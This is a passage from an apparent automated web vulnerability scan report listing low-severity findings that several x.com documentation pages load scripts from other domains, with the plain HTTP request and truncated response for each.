Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.122. https://www.x.com/docs/DOC-1374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.123. https://www.x.com/docs/DOC-1401

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.124. https://www.x.com/docs/DOC-1431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.125. https://www.x.com/docs/DOC-1551

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.126. https://www.x.com/docs/DOC-1613

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.127. https://www.x.com/docs/DOC-2241

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.128. https://www.x.com/docs/DOC-2346

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.129. https://www.x.com/docs/DOC-3201

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.130. https://www.x.com/docs/DOC-3212

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.131. https://www.x.com/docs/DOC-3251

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.132. https://www.x.com/docs/DOC-3271

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.133. https://www.x.com/docs/DOC-3321

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.134. https://www.x.com/docs/DOC-3322

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.135. https://www.x.com/docs/DOC-3323

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.136. https://www.x.com/docs/DOC-3345

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.137. https://www.x.com/docs/DOC-3351

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.138. https://www.x.com/docs/DOC-3352

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
